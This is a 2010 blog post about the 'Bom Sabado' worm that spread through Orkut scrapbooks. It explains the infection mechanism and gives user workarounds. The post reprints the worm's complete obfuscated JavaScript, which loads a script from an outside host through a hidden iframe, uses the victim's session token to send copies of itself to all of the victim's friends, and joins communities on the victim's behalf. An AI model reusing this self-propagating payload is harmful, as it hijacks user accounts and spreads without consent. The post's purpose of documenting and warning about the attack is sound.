Pages

Saturday, September 25, 2010

Orkut Under Hackers Attack





Orkut new version is found to be affected by a mass spreading new worm.
The worms static analysis says that its just a mass spreading worm which uses ur scrap book to spread and makes u join few communities.
The worm writer bypassed the script restrictions on orkut by passing on the following tags to IFRAME
>
Here the java script code which is hosted in tptools.com is called via onload function and excuted, and this happen when u login and reach ur orut home age
as ur new scraps are updated in ur home page, or either by visitng your scrap book triggers the excution of the code.
The worm is programmed to send copy of itself to all in ur friendlist via scrap and make u join few communities.
And there would not be much harm as of now, and I dont think you need to change your passwod and all.
var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\ x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F \x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x5 4\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x 61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\ x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77"," \x50\x4F\x53\x54","\x53\x63\x72\x61\x70\x62\x6F\x6 F\x6B\x3F","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x6 5\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x 69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77 \x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x 6F\x64\x65\x64\x3B","\x73\x65\x74\x52\x65\x71\x75\ x65\x73\x74\x48\x65\x61\x64\x65\x72","\x26\x73\x63 \x72\x61\x70\x54\x65\x78\x74\x3D","\x3C\x73\x74\x7 9\x6C\x65\x2F\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\ x73\x74\x79\x6C\x65\x3D\x64\x69\x73\x70\x6C\x61\x7 9\x3A\x6E\x6F\x6E\x65\x20\x6F\x6E\x6C\x6F\x61\x64\ x3D\x22\x61\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6 E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\ x65\x6E\x74\x28\x20\x27\x73\x63\x72\x69\x70\x74\x2 7\x29\x3B\x61\x2E\x73\x72\x63\x20\x3D\x20\x27\x2F\ x27\x20\x2B\x20\x27\x2F\x74\x70\x74\x6F\x6F\x6C\x7 3\x2E\x6F\x27\x2B\x27\x72\x67\x2F\x77\x6F\x72\x6D\ x2E\x6A\x73\x27\x2B\x27\x23\x3C\x77\x62\x72\x3E\x2 3\x27\x3B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\ x2E\x20\x62\x6F\x64\x79\x20\x2E\x20\x61\x70\x70\x6 5\x6E\x64\x43\x68\x69\x6C\x64\x28\x20\x61\x20\x29\ x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x42\x6 F\x6D\x20\x53\x61\x62\x61\x64\x6F\x21","\x26\x75\x 69\x64\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x73\ x75\x62\x6D\x69\x74\x3D\x31","\x73\x65\x6E\x64","\ x47\x45\x54","\x52\x65\x71\x75\x65\x73\x74\x46\x72 \x69\x65\x6E\x64\x73\x3F\x72\x65\x71\x3D\x66\x6C\x 26\x75\x69\x64\x3D","\x75\x69\x64","\x26\x6F\x78\x 68\x3D\x31","\x77\x68\x69\x6C\x65\x20\x28\x74\x72\ x75\x65\x29\x3B\x20\x26\x26\x26\x53\x54\x41\x52\x5 4\x26\x26\x26","","\x72\x65\x70\x6C\x61\x63\x65"," \x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x43\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x4A\x6F\x69\ x6E\x3F\x63\x6D\x6D\x3D","\x26\x41\x63\x74\x69\x6F \x6E\x2E\x6A\x6F\x69\x6E\x3D\x31","\x31\x30\x36\x3 6\x39\x38\x38\x30\x38","\x36","\x35\x35\x38\x34\x3 9\x34","\x31\x30\x36\x36\x39\x38\x36\x32\x38","\x3 1\x30\x36\x36\x39\x31\x33\x34\x31","\x76\x61\x72\x 20\x66\x72\x69\x65\x6E\x64\x73\x20\x3D\x20","\x3B" ,"\x6C\x69\x73\x74","\x64\x61\x74\x61","\x69\x6 4"];


function createXMLHttpRequest()
{
try
{
return new XMLHttpRequest();
}
catch(e)
{
return new ActiveXObject(_0x37a1[0]);
}
;
}
;
var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);
function sendScrap(_0x7c2bx4)
{
var _0x7c2bx5=createXMLHttpRequest();
_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);
_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);
_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);
} ;
function requestFriends()
{
var _0x7c2bx5=createXMLHttpRequest();
_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);
_0x7c2bx5[_0x37a1[15]](null);
return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);
} ;
function joinCMM(_0x7c2bx8)
{
var _0x7c2bx5=createXMLHttpRequest();
_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);
_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);
_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);
} ;
joinCMM(_0x37a1[26]);
joinCMM(_0x37a1[27]);
joinCMM(_0x37a1[28]);
joinCMM(_0x37a1[29]);
joinCMM(_0x37a1[30]);
eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);
for(x in friends[_0x37a1[34]][_0x37a1[33]])
{
uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);
sendScrap(uid[_0x37a1[35]]);} ;
this attack was done by some brazillian hackers.
The analysis of the payload would be done soon and would be updated
Also visit:-http://orkutdiary.com/bug-flaws/bom-sabado-orkut-is-under-attack-with-a-new-spam-virus/


Workaround - Below is a workaround posted by Arikarin. Use at your own risk. I didn’t try it.
A way to get rid of this and even to change your pass if you want to is:
  1. Clear your cookies/cache, then you may get an ‘Automated Query’ message. Don’t hustle about it.
  2. Just logout from your account, if you don’t know about the logout link. Here it is : http://www.orkut.co.in/GLogin?cmd=logout
  3. After that just go to settings page or if not, better to do anything is to switch on to the ‘OLDER VERSION’ of Orkut and try re-setting your password. :)
You can use older version of Orkut or simply mobile version at m.orkut.com! I used m.orkut.com only!

0 comments:

Post a Comment

Popular Posts